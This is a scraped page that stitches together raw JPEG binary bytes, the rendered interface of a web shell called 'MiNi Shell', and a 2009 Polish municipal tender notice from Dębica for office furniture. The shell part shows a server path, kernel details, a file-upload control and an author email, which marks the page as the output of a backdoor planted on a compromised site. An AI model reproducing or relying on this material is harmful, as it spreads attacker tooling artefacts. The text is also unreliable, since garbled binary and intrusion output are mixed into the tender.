JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/12162-N-2009.html

<p class="kh_header"><b>Dębica: Dostawa wraz z montażem mebli biurowych do Urzędu Gminy w Dębicy - pokoje nr: 12,13,14,29 i 31 .</b><br>
<b>Numer ogłoszenia: 12162 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 014 6803324, 6803310, faks 014 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem mebli biurowych do Urzędu Gminy w Dębicy - pokoje nr: 12,13,14,29 i 31 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem mebli biurowych do Urzędu Gminy w Dębicy - pokoje nr: 12,13,14,29 i 31 - szczegółowo opisane w Formularzu Cenowym stanowiącym Załącznik nr 4 do SIWZ oraz w Projekcie wystroju  wnętrz - aranżacja komputerowa stanowiącym załącznik nr 5 do SIWZ.
Załącznik   nr 4 
      Pieczęć Wykonawcy

FORMULARZ CENOWY - 
ZESTAWIENIE MEBLI 
URZĄD GMINY DĘBICA REF. GPK i OrASO
                                    (Cena netto obejmuje dostawę i MONTAŻ mebli)

Pokój nr 12
L.p.	Nazwa	Ilość
sztuk	Cena netto [zł]
1	Szafa aktowa 3-segmentowa rozsuwana z 5 półkami
Wymiary: 3800 x 500 x 2000 mm	1	
2	Nadstawka 3-segmentowa aktowa zamykana (do poz. nr 1) z 1 półką
Wymiary: 3800 x 500 x 900 mm	1	
3	Szafa na mapy z 16 szufladami zamykana
Wymiary: 1080 x 750 x 2000 mm	1	
4	Nadstawka aktowa zamykana (do poz. nr 3) z 1 półką
Wymiary: 1080 x 750 x 900 mm	1	
5	Regał otwarty z 5 półkami
Wymiary: 800 x 500 x 2000 mm	1	
6	Nadstawka aktowa na regał zamykana (do poz. nr 5) z 1 półką
Wymiary: 800 x 500 x 900 mm	1	
7	Szafka wisząca zamykana z 2 półkami
Wymiary: 1000 x 500 x 900 mm	1	




Pokój nr 13
L.p.	Nazwa	Ilość
sztuk	Cena netto [zł]
1	Szafa na mapy z 16 szufladami zamykana
Wymiary: 1080 x 750 x 2000 mm	1	
2	Nadstawka aktowa zamykana (do poz. nr 1) z 1 półką
Wymiary: 1080 x 750 x 900 mm	1	
3	Szafa aktowa zamykana z 5 półkami
Wymiary: 1000 x 400 x 2000 mm	1	
4	Nadstawka aktowa zamykana (do poz. nr 3) z 1 półką
Wymiary: 1000 x 400 x 900 mm	1	
5	Szafka wisząca zamykana z 1 półką
Wymiary: 720 x 310 x 800 mm	1	
6	Szafka stojąca zamykana z 1 półką
Wymiary: 850 x 600 x 800 mm	1	
7	Regał otwarty z 6 półkami przedzielony płytą pionową gr. 36 mm
Wymiary: 1950 x 500 x 2700 mm	1	








Pokój nr 14
L.p.	Nazwa	Ilość
sztuk	Cena netto [zł]
1	Szafa aktowa 3-segmentowa rozsuwana z 5 półkami
Wymiary: 3700 x 450 x 2000 mm	1	
2	Nadstawka aktowa 3-segmentowa zamykana (do poz. nr 1) z 1 półką
Wymiary: 3700 x 450 x 900 mm	1	
3	Regał otwarty z 4 półkami
Wymiary: 600 x 450 x 2000 mm	1	
4	Nadstawka aktowa na regał zamykana (do poz. nr 3) z 1 półką
Wymiary: 600 x 450 x 900 mm	1	
5	Szafka stojąca zamykana pod zlewozmywak 
Wymiary: 1100 x 600 x 850 mm	1	
6	Szafka wisząca zamykana z 1 półką
Wymiary: 1100 x 300 x 700 mm	1	
7	Szafka wisząca zamykana z 2 półkami
Wymiary: 1400 x 300 x 700 mm	1	
8	Blat na biurko (kolor czarny)
Wymiary: 1300 x 750 mm	1	
9	Półka pod klawiaturę (kolor czarny)
Wymiary: 700 x 560 mm	1	



	
Pokój nr 29
L.p.	Nazwa	Ilość
sztuk	Cena netto [zł]
1	Szafa aktowa 3-segmentowa rozsuwana z 5 półkami (każdy segment przedzielony płytą pionową gr. 36 mm)
Wymiary: 5100 x 500 x 2000 mm	1	
2	Nadstawka aktowa 3-segmentowa zamykana (do poz. nr 1) z 1 półką (każdy segment przedzielony płytą pionową gr. 36 mm)
Wymiary: 5100 x 500 x 900 mm	1	
3	Regał otwarty z 5 półkami
Wymiary: 450 x 500 x 2000 mm	1	
4	Szafka wisząca zamykana z przegrodą pionową i 1 półką 
Wymiary: 1100 x 500 x 900 mm	1	
5	Szafka pod drukarkę na kółkach zamykana z 1 półką
Wymiary: 650 x 400 x 800 mm	1	



Pokój nr 31
L.p.	Nazwa	Ilość
sztuk	Cena netto [zł]
1	Szafa aktowa zamykana z 5 półkami
Wymiary: 800 x 450 x 2000 mm	1	
2	Biurko pod komputer (półka pod klawiaturę, szafka zamykane i szuflada nad drzwiami) 
Wymiary: 1100 x 600 x 750 mm	2	
3	Lada półokrągła na stelarzu metalowym o wysokości 750 mm, z nadstawką na wysokości 1100 mm (półki pod klawiaturę - 3 szt., dostosowane do stacji komputerowych - 3 szt.);
od strony klienta: gięty MDF oklejony HPL-m z cokolikiem,
Wymiary: przekątna lady - 3950 mm, szerokość dolnego blatu - 650 mm, szerokość górnego blatu - 280 mm	1	
4	Kontener na kółkach z 3 szufladami (zamykane na zamek centralny) 
Wymiary: 400 x 500 x 600 mm	3	


	




Gwarantujemy ,że dostarczone i zamontowane meble będą posiadały :
-	kolor: jasny brąz,
-	krawędzie drzwi, blatów, czoła szuflad oklejone ABS gr. 2 mm,
-	w każdych drzwiach zamek patentowy,
-	segmenty szaf przesuwnych przedzielone płytą pionową gr. 36 mm,
-	w szafach przesuwnych przegrody,
-	przestrzenie między półkami na wysokość segregatora,
-	drzwi przesuwne zamontowane na cokoliku wysokości 10  cm, grubość płyty dolnej 36  mm,
- 	szuflady w szafie na mapy przystosowane do wielkości mapy i zabezpieczone przed wypadaniem..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> .  WYMAGANIA DOTYCZĄCE  WADIUM
1.	 Zamawiający wymaga  wniesienia wadium w wysokości  800,00 zł (słownie: osiemset  złotych 00/100). 
2.	Wadium może być wnoszone w jednej lub kilku następujących formach ,zgodnie z  art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
            Wadium wnoszone w pieniądzu  wpłaca się  przelewem  na konto Zamawiającego: 
             63 12 40 4764 1111 0000 4861 2049  w banku PEKAO SA Oddział w Dębicy.
          W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się  datę i godzinę
          uznania  kwoty na   rachunku Zamawiającego.

4.       W przypadku Wykonawców  ubiegających się wspólnie o udzielenie zamówienia (art.23 ustawy Pzp) i  
    wniesienia wadium w formie opisanej w art.45 ust.6 pkt 3 i 4 tj. gwarancjach bankowych i
    ubezpieczeniowych- Zamawiający żąda aby w treści gwarancji byli wskazani wszyscy Wykonawcy
    ubiegający się wspólnie o udzielenie zamówienia( np. w konsorcjum - wszyscy uczestnicy
    konsorcjum, w spółce cywilnej - wszyscy wspólnicy spółki cywilnej).
 
5.      W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego
         wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego  w
         Sekretariacie   lub zamieścić w osobnej kopercie - opisanej WADIUM dołączonej do oferty.

6.      Nie wniesienie wadium w terminie spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4
         ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.  WARUNKI  UDZIAŁU W POSTĘPOWANIU   ORAZ  SPOSÓB  OCENY   ICH SPEŁNIANIA
     O udzielenie zamówienia mogą ubiegać się wykonawcy , którzy :
1) Posiadają uprawnienia  do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

  2) Posiadają  niezbędną  wiedzę  i doświadczenie oraz dysponują  potencjałem technicznym i osobami zdolnymi
      do wykonania zamówienia  lub  przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału
      technicznego i osób zdolnych do wykonania zamówienia.
-Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - tym okresie) wykonał   minimum 1 dostawę odpowiadającą swoim rodzajem i wartością  dostawie  stanowiącej  przedmiot zamówienia ( dostawa mebli biurowych wraz z montażem ) , z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców. Wymagane jest wykazanie co najmniej jednej  w/w dostawy    o wartości min. 20 000,00 zł brutto  oraz załączenie dokumentów potwierdzających, że  dostawa ta została wykonana należycie ,

  3) Znajdują  się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

  4) Niepodlegają  wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełniania warunków podmiotowych udziału w postępowaniu nastąpi na podstawie:
1)	złożonych oświadczeń (w zakresie art. 22 ust. 1 i  art. 24 ust. 1 ustawy Pzp ), 
2)	dokumentów potwierdzających spełnianie tych warunków - 
        - metodą: -spełnia / nie spełnia

ZAMAWIAJĄCY WYKLUCZY WYKONAWCÓW, KTÓRZY:
- nie spełniają warunków udziału w  postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy Prawo zamówień publicznych,
- wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba, że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji (z zastrzeżeniem zamówień udzielanych na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2 ustawy),
-   złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania, 
- nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy,
-   podlegają wykluczeniu na podstawie art. 24 ust. 1 pkt 1 - 9
Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą. 

6.  WYMAGANIA PRZEDMIOTOWE ORAZ SPOSÓB OCENY ICH SPEŁNIANIA
1. Wykonana  dostawa  wraz montażem  musi być zgodna z opisem przedmiotu zamówienia zawartym w SIWZ  pkt. 2.2 
2. Oferta musi zagwarantować:
a)  termin realizacji zamówienia - do dnia :  31.03.2009 r.
c) termin płatności wynosi 30 dni od daty wpływu faktury do siedziby Zamawiającego.
d) wartość brutto przedmiotu zamówienia nie będzie podlegać waloryzacji.
3. Wymagania przedmiotowe dotyczące mebli i ich montażu :
-	kolor: jasny brąz,
-	krawędzie drzwi, blatów, czoła szuflad oklejone ABS gr. 2  mm,
-	w każdych drzwiach zamek patentowy,
-	segmenty szaf przesuwnych przedzielone płytą pionową gr. 36  mm,
-	w szafach przesuwnych przegrody,
-	przestrzenie między półkami na wysokość segregatora,
-	drzwi przesuwne zamontowane na cokoliku wysokości 10 cm, grubość płyty dolnej 36 mm,
     - 	szuflady w szafie na mapy przystosowane do wielkości mapy i zabezpieczone przed wypadaniem.
     4. Zamawiający wymaga aby Wykonawca dokonał własnych pomiarów mebli do montażu - wg wykazu w
         FORMULARZU CENOWYM -  oświadczenie złożone w druku OFERTA.

Ocena spełniania  wymagań  przedmiotowych nastąpi na podstawie złożonych oświadczeń i dokumentów potwierdzających spełnianie tych wymagań metodą :  spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 5. WYKAZ   DOKUMENTÓW  I  OŚWIADCZEŃ ,  JAKIE  MAJĄ   DOSTARCZYĆ   WYKONAWCY  NA POTWIERDZENIE   SPEŁNIANIA   WARUNKÓW   UDZIAŁU   W   POSTĘPOWANIU
5.1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert .
5.2. Oświadczenie w zakresie art. 24 ust. 1 ustawy Pzp. - Załącznik nr   1 do SIWZ.
5.3. Oświadczenie w zakresie art. 22 ust. 1 ustawy Pzp.-  Załącznik  nr  2 do SIWZ.
5.4 Wykaz wykonanych dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców.  Wymagane jest wykazanie co najmniej 1 dostawy wraz montażem mebli biurowych o wartości min. 20 000,00 zł  brutto  - Załącznik nr 3 do SIWZ
5.5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej to :
 - zamiast dokumentu o którym mowa  w pkt. 5.1,  - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający , że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 mieś. przed upływem  terminu składania ofert .
5.6.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,
nie wydaje się dokumentów, o których mowa w pkt. 5.8. SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.7. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagane dokumenty wymienione w punkcie  5.1 , 5.2 , 5.3   muszą  być złożone  przez każdego z  wykonawców osobno..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.ugdebica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Dębicy pok.27
39-200 Dębica, ul. Batorego 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2009 godzina 09:30, miejsce: Urząd Gminy w Dębicy - SEKRETARIAT
39-200 Dębica, ul. Batorego 13.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com